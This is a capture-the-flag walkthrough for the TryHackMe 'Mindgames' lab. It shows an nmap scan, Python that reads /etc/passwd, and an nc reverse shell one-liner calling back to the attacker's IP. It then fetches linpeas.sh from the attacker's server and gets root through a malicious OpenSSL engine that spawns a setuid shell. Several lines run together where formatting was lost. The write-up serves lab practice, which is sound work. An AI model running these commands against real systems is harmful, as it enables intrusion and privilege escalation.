TryHackMe | Mindgames

Reconnaissance

First thing first, we run a simple nmap scan to see which ports are open and what services are running on these ports.

nmap -sC -sV -O -oA simple_scan 10.10.229.21
  • -sC: run default nmap scripts
  • -sV: detect service version
  • -O: detect OS
  • -oA: output all formats and store in file named simple_scan

Enumeration

Open the website in browser, on visiting the web page first thing I see is brainf*ck text.

f = open("/etc/passwd", "r")
print(f.read())
import osos.system('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.8.13.70 7896 > /tmp/f')
python3 -c 'import pty;pty.spawn("/bin/bash")'cat user.txt

Privilege Escalation

Now we have got a stable shell lets proceed with privilege escalation. First thing first, lets transfer linpeas.sh file to target machine. To do this first we have to create a server to host linpeas.sh file, I am using ‘SimpleHTTPServer’ module to create a server in our local machine and to download use wget on target machine. Give appropriate privileges to the file and run it.

python -m SimpleHTTPServer 8080wget http://10.8.13.70:8080/linpeas.shchmod +x linpeas.sh./linpeas.sh
#include <unistd.h>

__attribute__((constructor))
static void init() {
setuid(0);
execl("/bin/sh", "sh", NULL);
}
gcc -fPIC -o openssl.o -c openssl.c
gcc -shared -o openssl.so -lcrypto openssl.o
wget http://10.8.13.70:8080/openssl.sochmod +x openssl.soopenssl req -engine ./openssl.so
cat /root/root.txt

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store